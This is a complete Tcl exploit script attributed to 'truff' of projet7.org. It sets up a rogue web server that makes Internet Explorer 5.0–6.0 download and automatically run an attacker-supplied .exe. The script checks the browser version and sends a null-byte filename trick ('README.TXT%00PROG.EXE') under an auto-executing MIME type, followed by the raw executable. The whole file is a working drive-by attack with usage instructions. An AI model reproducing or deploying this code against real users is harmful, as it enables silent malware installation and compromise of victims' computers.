#!/usr/local/bin/tclsh ################################################### # IEsploit.tcl by truff (truff@projet7.org) # # # # Upload and runs a .exe on a WindoZe b0x # # Exploits 2 holes in IE, a %00 in the file name # # and the auto execution of certain mime types # # # # Usage: ./IEsploit.tcl code.exe # # and on a Windoze b0x # # http://ip_of_the_b0x_where_the_exploit_runs # # # # Tested on : Xp running MSIE 6.0 # # w2k running MSIE 5.5 # # w98 running MSIE 5.0 # # # # www.projet7.org -Security Researchs- # ################################################### proc Connection {s a p} { puts "Connection acceptée $a $p" fconfigure $s -blocking 1 fileevent $s readable "Message $s" } proc Message {s} { global version gets $s line puts $line set index [string first "MSIE" $line] if {$index != -1} { set version [string range $line [expr $index + 5] [expr $index + 7]] } set test [string equal $line ""] if {$test} { puts "Replys n0w !!" Reply $s } } proc Reply {s} { global file global version puts $s "HTTP/1.1 200 OK\r" set date [exec date] puts $s "Date: $date\r" puts $s "Server: Apache\r" if {[string equal $version "6.0"]} { puts "txt" puts $s "Content-disposition: inline; filename=\"README.TXT%00PROG.EXE\"\r" } else { puts "mid" puts $s "Content-disposition: inline; filename=\"README.MID%00PROG.EXE\"\r" } puts $s "Connection: close\r" if {[string equal $version "6.0"]} { puts $s "Content-Type: text/css\r" } else { puts $s "Content-Type: audio/midi\r" } puts $s "\r" fconfigure $s -translation binary set exe [open $file r] fconfigure $exe -translation binary set contents [read $exe] puts $s $contents flush $s fileevent $s readable "" close $s } set version "" set file [lindex $argv 0] socket -server Connection 80 set fin 0 vwait fin